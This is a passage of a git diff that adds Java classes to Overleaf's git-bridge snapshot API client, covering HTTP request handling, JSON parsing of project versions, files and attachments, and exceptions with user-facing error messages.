+ + @Override + public List<String> getDescriptionLines() { + return Arrays.asList(getMessage()); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/HTTPMethod.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/HTTPMethod.java new file mode 100644 index 0000000..30bc2d5 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/HTTPMethod.java @@ -0,0 +1,9 @@ +package uk.ac.ic.wlgitbridge.snapshot.base; + +/* + * Created by Winston on 16/11/14. + */ +public enum HTTPMethod { + POST, + GET +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/JSONSource.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/JSONSource.java new file mode 100644 index 0000000..764384b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/JSONSource.java @@ -0,0 +1,11 @@ +package uk.ac.ic.wlgitbridge.snapshot.base; + +import com.google.gson.JsonElement; + +/* + * Created by Winston on 06/11/14. 
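+ *
+ * Deserialization hook: implementors populate their own fields from a
+ * Gson JsonElement.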
+ */ +public interface JSONSource { + + void fromJSON(JsonElement json); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/MissingRepositoryException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/MissingRepositoryException.java new file mode 100644 index 0000000..5b26c4e --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/MissingRepositoryException.java @@ -0,0 +1,93 @@ +package uk.ac.ic.wlgitbridge.snapshot.base; + +import com.google.gson.JsonElement; +import java.util.Arrays; +import java.util.List; +import uk.ac.ic.wlgitbridge.git.exception.SnapshotAPIException; + +public class MissingRepositoryException extends SnapshotAPIException { + + public static final List<String> GENERIC_REASON = + Arrays.asList( + "This Overleaf project currently has no git access, either because", + "the project does not exist, or because git access is not enabled", + "for the project.", + "", + "If this is unexpected, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information."); + + static List<String> buildDeprecatedMessage(String newUrl) { + if (newUrl == null) { + return Arrays.asList( + "This project has not yet been moved into the new version of Overleaf. You will", + "need to move it in order to continue working on it. Please visit this project", + "online on www.overleaf.com to do this.", + "", + "After migrating this project to the new version of Overleaf, you will be", + "prompted to update your git remote to the project's new identifier.", + "", + "If this is unexpected, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information."); + } else { + return Arrays.asList( + "This project has not yet been moved into the new version of Overleaf. You will", + "need to move it in order to continue working on it. 
Please visit this project", + "online to do this:", + "", + " " + newUrl, + "", + "After migrating this project to the new version of Overleaf, you will be", + "prompted to update your git remote to the project's new identifier.", + "", + "If this is unexpected, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information."); + } + } + + static List<String> buildExportedToV2Message(String remoteUrl) { + if (remoteUrl == null) { + return Arrays.asList( + "This Overleaf project has been moved to Overleaf v2 and cannot be used with git at this time.", + "", + "If this error persists, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information."); + } else { + return Arrays.asList( + "This Overleaf project has been moved to Overleaf v2 and has a new identifier.", + "Please update your remote to:", + "", + " " + remoteUrl, + "", + "Assuming you are using the default \"origin\" remote, the following commands", + "will change the remote for you:", + "", + " git remote set-url origin " + remoteUrl, + "", + "If this does not work, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information."); + } + } + + private List<String> descriptionLines; + + public MissingRepositoryException() { + this.descriptionLines = GENERIC_REASON; + } + + public MissingRepositoryException(List<String> descriptionLines) { + this.descriptionLines = descriptionLines; + } + + @Override + public void fromJSON(JsonElement json) {} + + @Override + public String getMessage() { + return "no git access"; + } + + @Override + public List<String> getDescriptionLines() { + return this.descriptionLines; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/Request.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/Request.java new file mode 100644 index 0000000..4c5f318 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/Request.java @@ -0,0 +1,197 @@ +package uk.ac.ic.wlgitbridge.snapshot.base; + +import static org.asynchttpclient.Dsl.*; + +import com.google.api.client.http.*; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.io.IOException; +import java.util.Arrays; +import java.util.concurrent.*; +import javax.servlet.http.HttpServletResponse; +import org.asynchttpclient.AsyncHttpClient; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.util.Instance; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 06/11/14. 
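+ *
+ * Base class for asynchronous HTTP calls to the snapshot API. Subclasses
+ * pick the HTTP method and parse the JSON response; getResult() maps
+ * HTTP failures onto domain exceptions (401/403 to ForbiddenException;
+ * 404, 409, 429 and other 4xx statuses to MissingRepositoryException
+ * variants; everything else to FailedConnectionException).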
+ */ +public abstract class Request<T extends Result> { + + public static final AsyncHttpClient httpClient = asyncHttpClient(); + + private static final Executor executor = Executors.newCachedThreadPool(); + + private final String url; + + private Future<HttpResponse> future; + + public Request(String url) { + this.url = url; + } + + public CompletableFuture<T> request() { + switch (httpMethod()) { + case GET: + performGetRequest(); + break; + case POST: + performPostRequest(); + break; + default: + break; + } + CompletableFuture<T> ret = new CompletableFuture<>(); + executor.execute( + () -> { + try { + ret.complete(getResult()); + } catch (Throwable t) { + ret.completeExceptionally(t); + } + }); + return ret; + } + + private T getResult() + throws MissingRepositoryException, FailedConnectionException, ForbiddenException { + try { + HttpResponse response = future.get(); + Log.debug( + "{} {} ({}B) -> " + url, + response.getStatusCode(), + response.getStatusMessage(), + response.getHeaders().getContentLength()); + JsonElement json = Instance.gson.fromJson(response.parseAsString(), JsonElement.class); + return parseResponse(json); + } catch (InterruptedException e) { + throw new FailedConnectionException(); + } catch (ExecutionException e) { + Throwable cause = e.getCause(); + if (cause instanceof HttpResponseException) { + HttpResponseException httpCause = (HttpResponseException) cause; + int sc = httpCause.getStatusCode(); + if (sc == HttpServletResponse.SC_UNAUTHORIZED + || sc == HttpServletResponse.SC_FORBIDDEN) { // 401, 403 + throw new ForbiddenException(); + } else if (sc == 429) { // Too many requests + throw new MissingRepositoryException( + Arrays.asList( + "Rate-limit exceeded. Please wait a while and try again.", + "", + "If this is unexpected, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information.")); + } else if (sc == HttpServletResponse.SC_CONFLICT) { // 409 + try { + JsonObject json = Instance.gson.fromJson(httpCause.getContent(), JsonObject.class); + String code = json.get("code").getAsString(); + if ("projectHasDotGit".equals(code)) { + throw new MissingRepositoryException( + Arrays.asList( + "This project contains a '.git' entity at the top level, indicating that it is", + "already a git repository. 
The Overleaf git-bridge cannot work with this project", + "due to a known problem with handling these '.git' folders.", + "", + "We recommend removing the .git folder before trying again.", + "", + "If this is unexpected, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information.")); + } else { + throw new MissingRepositoryException(Arrays.asList("Conflict: 409")); + } + } catch (IllegalStateException + | ClassCastException + | NullPointerException _e) { // json parse errors + throw new MissingRepositoryException(Arrays.asList("Conflict: 409")); + } + } else if (sc == HttpServletResponse.SC_NOT_FOUND) { // 404 + try { + JsonObject json = Instance.gson.fromJson(httpCause.getContent(), JsonObject.class); + String message = json.get("message").getAsString(); + String newRemote; + if (json.has("newRemote")) { + newRemote = json.get("newRemote").getAsString(); + } else { + newRemote = null; + } + + if ("Exported to v2".equals(message)) { + throw new MissingRepositoryException( + MissingRepositoryException.buildExportedToV2Message(newRemote)); + } else if ("Overleaf v1 is Deprecated".equals(message)) { + String newUrl; + if (json.has("newUrl")) { + newUrl = json.get("newUrl").getAsString(); + } else { + newUrl = null; + } + throw new MissingRepositoryException( + MissingRepositoryException.buildDeprecatedMessage(newUrl)); + } + } catch (IllegalStateException | ClassCastException | NullPointerException ex) { + // disregard any errors that arose while handling the JSON + } + + throw new MissingRepositoryException(); + } else if (sc >= 400 && sc < 500) { + throw new MissingRepositoryException(MissingRepositoryException.GENERIC_REASON); + } + throw new FailedConnectionException(cause); + } else { + throw new FailedConnectionException(cause); + } + } catch (IOException e) { + Log.warn("Failed to parse JSON.", e); + throw new FailedConnectionException(); + } + } + + protected abstract HTTPMethod httpMethod(); + + protected void onBeforeRequest(HttpRequest request) throws IOException {} + + protected abstract T parseResponse(JsonElement json) throws FailedConnectionException; + + protected String getPostBody() { + return null; + } + + private void performGetRequest() { + Log.debug("GET -> " + url); + try { + HttpRequest request = Instance.httpRequestFactory.buildGetRequest(new GenericUrl(url)); + setTimeouts(request); + request(request); + } catch (IOException e) { + e.printStackTrace(); + throw new RuntimeException(e); + } + } + + private void performPostRequest() { + Log.debug("POST -> " + url); + try { + HttpRequest request = + Instance.httpRequestFactory.buildPostRequest( + new GenericUrl(url), + new ByteArrayContent("application/json", getPostBody().getBytes())); + setTimeouts(request); + request(request); + } catch (IOException e) { + e.printStackTrace(); + throw new RuntimeException(e); + } + } + + private void request(HttpRequest request) throws IOException { + onBeforeRequest(request); + future = request.executeAsync(); + } + + private void setTimeouts(HttpRequest request) { + // timeouts are 20s by default + int threeMinutesInMs = 1000 * 60 * 3; + request.setReadTimeout(threeMinutesInMs); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/Result.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/Result.java new file mode 100644 index 0000000..2c4adb3 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/Result.java @@ -0,0 
+1,34 @@ +package uk.ac.ic.wlgitbridge.snapshot.base; + +import com.google.gson.JsonElement; + +/* + * Created by Winston on 06/11/14. + */ +public abstract class Result implements JSONSource { + + private JsonElement json; + private Request request; + + public Result(Request request, JsonElement json) { + this.request = request; + this.json = json; + fromJSON(json); + } + + protected Result() {} + + public Request getRequest() { + return request; + } + + public abstract JsonElement toJson(); + + @Override + public String toString() { + if (json == null) { + return "result"; + } + return json.toString(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/SnapshotAPIRequest.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/SnapshotAPIRequest.java new file mode 100644 index 0000000..7fc3b84 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/SnapshotAPIRequest.java @@ -0,0 +1,34 @@ +package uk.ac.ic.wlgitbridge.snapshot.base; + +import com.google.api.client.auth.oauth2.Credential; +import com.google.api.client.http.HttpRequest; + +/* + * Created by Winston on 06/11/14. + */ +public abstract class SnapshotAPIRequest<T extends Result> extends Request<T> { + + private static String BASE_URL; + + private final Credential oauth2; + + public SnapshotAPIRequest(String projectName, String apiCall, Credential oauth2) { + super(BASE_URL + projectName + apiCall); + this.oauth2 = oauth2; + } + + @Override + protected void onBeforeRequest(HttpRequest request) { + if (oauth2 != null) { + request.setInterceptor( + request1 -> { + oauth2.intercept(request1); + }); + } + } + + /* baseURL ends with / */ + public static void setBaseURL(String baseURL) { + BASE_URL = baseURL + "docs/"; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/exception/FailedConnectionException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/exception/FailedConnectionException.java new file mode 100644 index 0000000..ee3187f --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/exception/FailedConnectionException.java @@ -0,0 +1,18 @@ +package uk.ac.ic.wlgitbridge.snapshot.exception; + +import org.eclipse.jgit.transport.ServiceMayNotContinueException; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 08/11/14. + */ +public class FailedConnectionException extends ServiceMayNotContinueException { + + public FailedConnectionException() { + super(Util.getServiceName() + " server not available. Please try again later."); + } + + public FailedConnectionException(Throwable cause) { + super(cause); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/GetDocRequest.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/GetDocRequest.java new file mode 100644 index 0000000..94189a4 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/GetDocRequest.java @@ -0,0 +1,35 @@ +package uk.ac.ic.wlgitbridge.snapshot.getdoc; + +import com.google.api.client.auth.oauth2.Credential; +import com.google.gson.JsonElement; +import uk.ac.ic.wlgitbridge.snapshot.base.HTTPMethod; +import uk.ac.ic.wlgitbridge.snapshot.base.SnapshotAPIRequest; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 06/11/14. 
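+ *
+ * Fetches a project's latest version metadata. With the empty API_CALL,
+ * the request resolves to GET <base>/docs/<projectName> (see
+ * SnapshotAPIRequest for how the URL is assembled).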
+ */ +public class GetDocRequest extends SnapshotAPIRequest<GetDocResult> { + + public static final String API_CALL = ""; + + public GetDocRequest(Credential oauth2, String projectName) { + super(projectName, API_CALL, oauth2); + Log.debug("GetDocRequest({}, {})", "oauth2: <oauth2>", "projectName: " + projectName); + } + + public GetDocRequest(String projectName) { + this(null, projectName); + } + + @Override + protected HTTPMethod httpMethod() { + return HTTPMethod.GET; + } + + @Override + protected GetDocResult parseResponse(JsonElement json) throws FailedConnectionException { + return new GetDocResult(this, json); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/GetDocResult.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/GetDocResult.java new file mode 100644 index 0000000..88c10ba --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/GetDocResult.java @@ -0,0 +1,125 @@ +package uk.ac.ic.wlgitbridge.snapshot.getdoc; + +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; +import uk.ac.ic.wlgitbridge.git.exception.SnapshotAPIException; +import uk.ac.ic.wlgitbridge.snapshot.base.ForbiddenException; +import uk.ac.ic.wlgitbridge.snapshot.base.Request; +import uk.ac.ic.wlgitbridge.snapshot.base.Result; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.exception.InvalidProjectException; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.WLUser; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 06/11/14. + */ +public class GetDocResult extends Result { + + private int error; + private int versionID; + private String createdAt; + private WLUser user; + + private SnapshotAPIException exception; + private ForbiddenException forbidden; + + public GetDocResult(Request request, JsonElement json) throws FailedConnectionException { + super(request, json); + } + + public GetDocResult( + JsonElement error, int versionID, String createdAt, String email, String name) { + if (error == null) { + this.error = -1; + } else { + this.error = error.getAsInt(); + } + this.versionID = versionID; + this.createdAt = createdAt; + this.user = new WLUser(name, email); + } + + @Override + public JsonElement toJson() { + JsonObject jsonThis = new JsonObject(); + if (error == -1) { + jsonThis.addProperty("latestVerId", versionID); + jsonThis.addProperty("latestVerAt", createdAt); + JsonObject latestVerBy = new JsonObject(); + latestVerBy.addProperty("email", getEmail()); + latestVerBy.addProperty("name", getName()); + jsonThis.add("latestVerBy", latestVerBy); + } else { + jsonThis.addProperty("status", error); + String message; + if (error == 403) { + message = "Forbidden"; + } else { + message = "Not Found"; + } + jsonThis.addProperty("message", message); + } + return jsonThis; + } + + @Override + public void fromJSON(JsonElement json) { + Log.debug("GetDocResult: " + json); + JsonObject jsonObject = json.getAsJsonObject(); + if (jsonObject.has("status")) { + switch (jsonObject.get("status").getAsInt()) { + case 401: + case 403: + forbidden = new ForbiddenException(); + break; + case 404: + exception = new InvalidProjectException(); + break; + default: + throw new IllegalArgumentException("unknown get doc error code"); + } + } else { + versionID = jsonObject.get("latestVerId").getAsInt(); + // Handle edge-case for projects with no changes, that 
were imported
+ // to v2. In which case `latestVerAt` will not be present.
+ // See: https://github.com/overleaf/writelatex-git-bridge/pull/50
+ if (jsonObject.has("latestVerAt")) {
+ createdAt = jsonObject.get("latestVerAt").getAsString();
+ } else {
+ createdAt = null;
+ }
+ String name = null;
+ String email = null;
+ JsonElement latestVerBy = jsonObject.get("latestVerBy");
+
+ // Guard against the key being absent entirely (null) as well as it
+ // holding something other than a user object.
+ if (latestVerBy != null && latestVerBy.isJsonObject()) {
+ JsonObject userObject = latestVerBy.getAsJsonObject();
+ name = userObject.get("name").getAsString();
+ email = userObject.get("email").getAsString();
+ }
+
+ user = new WLUser(name, email);
+ }
+ }
+
+ public int getVersionID() throws GitUserException {
+ if (exception != null) {
+ throw exception;
+ }
+ return versionID;
+ }
+
+ public String getCreatedAt() {
+ return createdAt;
+ }
+
+ public String getName() {
+ return user.getName();
+ }
+
+ public String getEmail() {
+ return user.getEmail();
+ }
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/exception/InvalidProjectException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/exception/InvalidProjectException.java new file mode 100644 index 0000000..86b9e20 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/exception/InvalidProjectException.java @@ -0,0 +1,39 @@
+package uk.ac.ic.wlgitbridge.snapshot.getdoc.exception;
+
+import com.google.gson.JsonArray;
+import com.google.gson.JsonElement;
+import java.util.LinkedList;
+import java.util.List;
+import uk.ac.ic.wlgitbridge.git.exception.SnapshotAPIException;
+
+/*
+ * Created by Winston on 08/11/14.
+ */
+public class InvalidProjectException extends SnapshotAPIException {
+
+ private List<String> errors;
+
+ public InvalidProjectException() {
+ super();
+ errors = new LinkedList<String>();
+ }
+
+ @Override
+ public String getMessage() {
+ return "invalid project";
+ }
+
+ @Override
+ public List<String> getDescriptionLines() {
+ return errors;
+ }
+
+ @Override
+ public void fromJSON(JsonElement json) {
+ errors = new LinkedList<String>();
+ // Use a distinct name for the incoming JSON array rather than
+ // shadowing the "errors" field.
+ JsonArray jsonErrors = json.getAsJsonObject().get("errors").getAsJsonArray();
+ for (JsonElement error : jsonErrors) {
+ errors.add(error.getAsString());
+ }
+ }
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/GetForVersionRequest.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/GetForVersionRequest.java new file mode 100644 index 0000000..ca69f2e --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/GetForVersionRequest.java @@ -0,0 +1,42 @@
+package uk.ac.ic.wlgitbridge.snapshot.getforversion;
+
+import com.google.api.client.auth.oauth2.Credential;
+import com.google.gson.JsonElement;
+import uk.ac.ic.wlgitbridge.snapshot.base.HTTPMethod;
+import uk.ac.ic.wlgitbridge.snapshot.base.SnapshotAPIRequest;
+import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException;
+import uk.ac.ic.wlgitbridge.util.Log;
+
+/*
+ * Created by Winston on 06/11/14.
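+ *
+ * Fetches the full snapshot for a single version:
+ * GET <base>/docs/<projectName>/snapshots/<versionID>, parsed into a
+ * GetForVersionResult holding the version's files and attachments.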
+ */ +public class GetForVersionRequest extends SnapshotAPIRequest<GetForVersionResult> { + + public static final String API_CALL = "/snapshots"; + + private int versionID; + + public GetForVersionRequest(Credential oauth2, String projectName, int versionID) { + super(projectName, API_CALL + "/" + versionID, oauth2); + this.versionID = versionID; + Log.debug( + "GetForVersionRequest({}, {}, {})", + "oauth2: <oauth2>", + "projectName: " + projectName, + "versionID: " + versionID); + } + + @Override + protected HTTPMethod httpMethod() { + return HTTPMethod.GET; + } + + @Override + protected GetForVersionResult parseResponse(JsonElement json) throws FailedConnectionException { + return new GetForVersionResult(this, json); + } + + public int getVersionID() { + return versionID; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/GetForVersionResult.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/GetForVersionResult.java new file mode 100644 index 0000000..63bf5eb --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/GetForVersionResult.java @@ -0,0 +1,37 @@ +package uk.ac.ic.wlgitbridge.snapshot.getforversion; + +import com.google.gson.JsonElement; +import uk.ac.ic.wlgitbridge.snapshot.base.Request; +import uk.ac.ic.wlgitbridge.snapshot.base.Result; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 06/11/14. + */ +public class GetForVersionResult extends Result { + + private SnapshotData snapshotData; + + public GetForVersionResult(Request request, JsonElement json) { + super(request, json); + } + + public GetForVersionResult(SnapshotData snapshotData) { + this.snapshotData = snapshotData; + } + + @Override + public JsonElement toJson() { + return snapshotData.toJson(); + } + + @Override + public void fromJSON(JsonElement json) { + snapshotData = new SnapshotData(json); + Log.debug("GetForVersionResult({})", snapshotData); + } + + public SnapshotData getSnapshotData() { + return snapshotData; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotAttachment.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotAttachment.java new file mode 100644 index 0000000..cb897d5 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotAttachment.java @@ -0,0 +1,53 @@ +package uk.ac.ic.wlgitbridge.snapshot.getforversion; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonPrimitive; +import uk.ac.ic.wlgitbridge.snapshot.base.JSONSource; + +/* + * Created by Winston on 06/11/14. 
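+ *
+ * Wire format is a two-element JSON array: [url, path].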
+ */ +public class SnapshotAttachment implements JSONSource { + + private String url; + private String path; + + public SnapshotAttachment(JsonElement json) { + fromJSON(json); + } + + @Override + public String toString() { + return "SnapshotAttachment(url: " + url + ", path: " + path + ")"; + } + + @Override + public void fromJSON(JsonElement json) { + JsonArray jsonArray = json.getAsJsonArray(); + url = jsonArray.get(0).getAsString(); + path = jsonArray.get(1).getAsString(); + } + + public String getUrl() { + return url; + } + + public String getPath() { + return path; + } + + /* For the Mock Snapshot server */ + + public SnapshotAttachment(String url, String path) { + this.url = url; + this.path = path; + } + + public JsonElement toJson() { + JsonArray jsonThis = new JsonArray(); + jsonThis.add(new JsonPrimitive(url)); + jsonThis.add(new JsonPrimitive(getPath())); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotData.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotData.java new file mode 100644 index 0000000..bad0524 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotData.java @@ -0,0 +1,77 @@ +package uk.ac.ic.wlgitbridge.snapshot.getforversion; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.util.ArrayList; +import java.util.List; +import uk.ac.ic.wlgitbridge.snapshot.base.JSONSource; + +/* + * Created by Winston on 06/11/14. + */ +public class SnapshotData implements JSONSource { + + public static final String JSON_KEY_SRCS = "srcs"; + public static final String JSON_KEY_ATTS = "atts"; + + private List<SnapshotFile> srcs; + private List<SnapshotAttachment> atts; + + public SnapshotData(JsonElement json) { + srcs = new ArrayList<>(); + atts = new ArrayList<>(); + fromJSON(json); + } + + public SnapshotData(List<SnapshotFile> srcs, List<SnapshotAttachment> atts) { + this.srcs = srcs; + this.atts = atts; + } + + @Override + public String toString() { + return "SnapshotData(srcs: " + srcs + ", atts: " + atts + ")"; + } + + public JsonElement toJson() { + JsonObject jsonThis = new JsonObject(); + JsonArray jsonSrcs = new JsonArray(); + for (SnapshotFile src : srcs) { + jsonSrcs.add(src.toJson()); + } + jsonThis.add("srcs", jsonSrcs); + JsonArray jsonAtts = new JsonArray(); + for (SnapshotAttachment att : atts) { + jsonAtts.add(att.toJson()); + } + jsonThis.add("atts", jsonAtts); + return jsonThis; + } + + @Override + public void fromJSON(JsonElement json) { + populateSrcs(json.getAsJsonObject().get(JSON_KEY_SRCS).getAsJsonArray()); + populateAtts(json.getAsJsonObject().get(JSON_KEY_ATTS).getAsJsonArray()); + } + + private void populateSrcs(JsonArray jsonArray) { + for (JsonElement json : jsonArray) { + srcs.add(new SnapshotFile(json)); + } + } + + private void populateAtts(JsonArray jsonArray) { + for (JsonElement json : jsonArray) { + atts.add(new SnapshotAttachment(json)); + } + } + + public List<SnapshotFile> getSrcs() { + return srcs; + } + + public List<SnapshotAttachment> getAtts() { + return atts; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotFile.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotFile.java new file mode 100644 index 0000000..e7f55f8 --- /dev/null +++ 
b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotFile.java @@ -0,0 +1,65 @@ +package uk.ac.ic.wlgitbridge.snapshot.getforversion; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonPrimitive; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; +import uk.ac.ic.wlgitbridge.snapshot.base.JSONSource; + +/* + * Created by Winston on 06/11/14. + */ +public class SnapshotFile extends RawFile implements JSONSource { + + private String path; + private byte[] contents; + + public SnapshotFile(JsonElement json) { + fromJSON(json); + } + + @Override + public String toString() { + return "SnapshotFile(path: " + path + ", contents: byte[" + contents.length + "])"; + } + + @Override + public void fromJSON(JsonElement json) { + JsonArray jsonArray = json.getAsJsonArray(); + contents = jsonArray.get(0).getAsString().getBytes(); + path = jsonArray.get(1).getAsString(); + } + + @Override + public String getPath() { + return path; + } + + @Override + public byte[] getContents() { + return contents; + } + + @Override + public long size() { + return contents.length; + } + + /* Mock server */ + + public SnapshotFile(String contents, String path) { + this.path = path; + if (contents != null) { + this.contents = contents.getBytes(); + } else { + this.contents = new byte[0]; + } + } + + public JsonElement toJson() { + JsonArray jsonThis = new JsonArray(); + jsonThis.add(new JsonPrimitive(new String(contents))); + jsonThis.add(new JsonPrimitive(path)); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/GetSavedVersRequest.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/GetSavedVersRequest.java new file mode 100644 index 0000000..d2d07aa --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/GetSavedVersRequest.java @@ -0,0 +1,31 @@ +package uk.ac.ic.wlgitbridge.snapshot.getsavedvers; + +import com.google.api.client.auth.oauth2.Credential; +import com.google.gson.JsonElement; +import uk.ac.ic.wlgitbridge.snapshot.base.HTTPMethod; +import uk.ac.ic.wlgitbridge.snapshot.base.SnapshotAPIRequest; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 06/11/14. 
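+ *
+ * Fetches the project's saved versions:
+ * GET <base>/docs/<projectName>/saved_vers.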
+ */ +public class GetSavedVersRequest extends SnapshotAPIRequest<GetSavedVersResult> { + + public static final String API_CALL = "/saved_vers"; + + public GetSavedVersRequest(Credential oauth2, String projectName) { + super(projectName, API_CALL, oauth2); + Log.debug("GetSavedVersRequest({}, {})", "oauth2: <oauth2>", "projectName: " + projectName); + } + + @Override + protected HTTPMethod httpMethod() { + return HTTPMethod.GET; + } + + @Override + protected GetSavedVersResult parseResponse(JsonElement json) throws FailedConnectionException { + return new GetSavedVersResult(this, json); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/GetSavedVersResult.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/GetSavedVersResult.java new file mode 100644 index 0000000..0710061 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/GetSavedVersResult.java @@ -0,0 +1,59 @@ +package uk.ac.ic.wlgitbridge.snapshot.getsavedvers; + +import com.google.gson.Gson; +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.util.ArrayList; +import java.util.List; +import uk.ac.ic.wlgitbridge.snapshot.base.Request; +import uk.ac.ic.wlgitbridge.snapshot.base.Result; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 06/11/14. + */ +public class GetSavedVersResult extends Result { + + private List<SnapshotInfo> savedVers; + + public GetSavedVersResult(Request request, JsonElement json) throws FailedConnectionException { + super(request, json); + } + + public GetSavedVersResult(List<SnapshotInfo> savedVers) { + this.savedVers = savedVers; + } + + @Override + public JsonElement toJson() { + JsonArray jsonThis = new JsonArray(); + for (SnapshotInfo savedVer : savedVers) { + JsonObject jsonSavedVer = new JsonObject(); + jsonSavedVer.addProperty("versionId", savedVer.getVersionId()); + 